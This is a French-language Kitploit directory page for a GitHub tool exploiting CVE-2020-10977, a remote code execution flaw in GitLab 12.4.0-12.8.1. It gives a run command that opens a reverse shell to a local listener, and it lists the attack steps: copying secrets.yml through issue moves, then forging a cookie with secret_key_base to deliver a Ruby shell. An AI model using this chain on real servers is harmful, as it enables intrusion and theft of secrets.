Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-10977 — Gitlab v12.4.0-8.1 RCE | Kitploit
Outils/GitHubGitHub/liath/cve-2020-10977
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubliath/cve-2020-10977

CVE-2020-10977

Gitlab v12.4.0-8.1 RCE

Voir le dépôt
21il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

GitLab v12.4.0-12.8.1 RCE

Basé entièrement sur https://github.com/dotPY-hax/gitlab_RCE, qui n'a pas fonctionné pour moi et le traitement HTML semblait fastidieux, donc je l'ai réécrit en JS.

Utilisation

Lancez un gestionnaire de reverse shell de la manière habituelle, puis exécutez ce script avec :

root@kitploit:~
TARGET_URI="https://target" TARGET_EMAIL_DOMAIN="laboratory.htb" \
 TARGET_USER="test" TARGET_PASSWORD="Test pass 123" \
 LOCAL_IP="10.10.14.142" LOCAL_PORT="44044" \
 node gitlab_rce.js

Un proxy peut être spécifié avec TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080". Burp est particulièrement utile pour le débogage avec ce script.

Ce que ça fait

  1. vérifie si la cible est accessible
  2. si l'utilisateur fourni existe déjà, passer à l'étape 5
  3. scanner un nom d'utilisateur qui n'existe pas encore
  4. créer cet utilisateur
  5. tenter de se connecter
  6. créer deux projets vides
  7. créer un nouveau ticket d'incident avec un lien malveillant dans son corps dans le premier projet
  8. déplacer le nouveau ticket vers l'autre projet, ce qui amène GitLab à réécrire notre lien malveillant et à copier le fichier pointé dans le répertoire uploads
  9. récupère le fichier cible, ici nous voulons le secrets.yml pour le secret_key_base
  10. utiliser secret_key_base pour fabriquer un cookie malveillant avec notre shell Ruby et le transmettre à GitLab
Télécharger l’outil